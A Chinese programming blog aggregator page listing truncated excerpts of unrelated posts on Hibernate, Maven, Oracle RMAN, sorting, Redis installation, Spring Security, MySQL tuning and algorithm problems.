都说spring利用AOP实现自动事务处理机制非常好,但在只有hibernate这个框架情况下,我们开启session、管理事务就往往很麻烦。
public void save(Object obj){
Session session = this.getSession();
Transaction tran = session.beginTransaction();
try
maven3实战读书笔记
braveCS
maven3
Maven简介
是什么?
Is a software project management and comprehension tool.项目管理工具
是基于POM概念(工程对象模型)
[设计重复、编码重复、文档重复、构建重复,maven最大化消除了构建的重复]
[与XP:简单、交流与反馈;测试驱动开发、十分钟构建、持续集成、富有信息的工作区]
功能:
编程之美-子数组的最大乘积
bylijinnan
编程之美
public class MaxProduct {
/**
* 编程之美 子数组的最大乘积
* 题目: 给定一个长度为N的整数数组,只允许使用乘法,不能用除法,计算任意N-1个数的组合中乘积中最大的一组,并写出算法的时间复杂度。
* 以下程序对应书上两种方法,求得“乘积中最大的一组”的乘积——都是有溢出的可能的。
* 但按题目的意思,是要求得这个子数组,而不
读书笔记-2
chengxuyuancsdn
读书笔记
1、反射
2、oracle年-月-日 时-分-秒
3、oracle创建有参、无参函数
4、oracle行转列
5、Struts2拦截器
6、Filter过滤器(web.xml)
1、反射
(1)检查类的结构
在java.lang.reflect包里有3个类Field,Method,Constructor分别用于描述类的域、方法和构造器。
2、oracle年月日时分秒
s
[求学与房地产]慎重选择IT培训学校
comsci
it
关于培训学校的教学和教师的问题,我们就不讨论了,我主要关心的是这个问题
培训学校的教学楼和宿舍的环境和稳定性问题
我们大家都知道,房子是一个比较昂贵的东西,特别是那种能够当教室的房子...
&nb
RMAN配置中通道(CHANNEL)相关参数 PARALLELISM 、FILESPERSET的关系
daizj
oracle rman filesperset PARALLELISM
RMAN配置中通道(CHANNEL)相关参数 PARALLELISM 、FILESPERSET的关系 转
PARALLELISM ---
我们还可以通过parallelism参数来指定同时"自动"创建多少个通道:
RMAN > configure device type disk parallelism 3 ;
表示启动三个通道,可以加快备份恢复的速度。
简单排序:冒泡排序
dieslrae
冒泡排序
public void bubbleSort(int[] array){
for(int i=1;i<array.length;i++){
for(int k=0;k<array.length-i;k++){
if(array[k] > array[k+1]){
初二上学期难记单词三
dcj3sjt126com
sciet
concert 音乐会
tonight 今晚
famous 有名的;著名的
song 歌曲
thousand 千
accident 事故;灾难
careless 粗心的,大意的
break 折断;断裂;破碎
heart 心(脏)
happen 偶尔发生,碰巧
tourist 旅游者;观光者
science (自然)科学
marry 结婚
subject 题目;
I.安装Memcahce 1. 安装依赖包libevent Memcache需要安装libevent,所以安装前可能需要执行 Shell代码 收藏代码
dcj3sjt126com
redis
wget http://download.redis.io/redis-stable.tar.gz
tar xvzf redis-stable.tar.gz
cd redis-stable
make
前面3步应该没有问题,主要的问题是执行make的时候,出现了异常。
异常一:
make[2]: cc: Command not found
异常原因:没有安装g
并发容器
shuizhaosi888
并发容器
通过并发容器来改善同步容器的性能,同步容器将所有对容器状态的访问都串行化,来实现线程安全,这种方式严重降低并发性,当多个线程访问时,吞吐量严重降低。
并发容器ConcurrentHashMap
替代同步基于散列的Map,通过Lock控制。
&nb
Spring Security(12)——Remember-Me功能
234390216
Spring Security Remember Me 记住我
Remember-Me功能
目录
1.1 概述
1.2 基于简单加密token的方法
1.3 基于持久化token的方法
1.4 Remember-Me相关接口和实现
位运算
焦志广
位运算
一、位运算符C语言提供了六种位运算符:
& 按位与
| 按位或
^ 按位异或
~ 取反
<< 左移
>> 右移
1. 按位与运算 按位与运算符"&"是双目运算符。其功能是参与运算的两数各对应的二进位相与。只有对应的两个二进位均为1时,结果位才为1 ,否则为0。参与运算的数以补码方式出现。
例如:9&am
nodejs 数据库连接 mongodb mysql
liguangsong
mongodb mysql node 数据库连接
1.mysql 连接
package.json中dependencies加入
"mysql":"~2.7.0"
执行 npm install
在config 下创建文件 database.js
java动态编译
olive6615
java HotSpot jvm 动态编译
在HotSpot虚拟机中,有两个技术是至关重要的,即动态编译(Dynamic compilation)和Profiling。
HotSpot是如何动态编译Javad的bytecode呢?Java bytecode是以解释方式被load到虚拟机的。HotSpot里有一个运行监视器,即Profile Monitor,专门监视
Storm0.9.5的集群部署配置优化
roadrunners
优化 storm.yaml
nimbus结点配置(storm.yaml)信息:
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional inf
101个MySQL 的调节和优化的提示
tomcat_oracle
mysql
1. 拥有足够的物理内存来把整个InnoDB文件加载到内存中——在内存中访问文件时的速度要比在硬盘中访问时快的多。 2. 不惜一切代价避免使用Swap交换分区 – 交换时是从硬盘读取的,它的速度很慢。 3. 使用电池供电的RAM(注:RAM即随机存储器)。 4. 使用高级的RAID(注:Redundant Arrays of Inexpensive Disks,即磁盘阵列
zoj 3829 Known Notation(贪心)
阿尔萨斯
ZOJ
题目链接:zoj 3829 Known Notation
题目大意:给定一个不完整的后缀表达式,要求有2种不同操作,用尽量少的操作使得表达式完整。
解题思路:贪心,数字的个数要要保证比∗的个数多1,不够的话优先补在开头是最优的。然后遍历一遍字符串,碰到数字+1,碰到∗-1,保证数字的个数大于等1,如果不够减的话,可以和最后面的一个数字交换位置(用栈维护十分方便),因为添加和交换代价都是1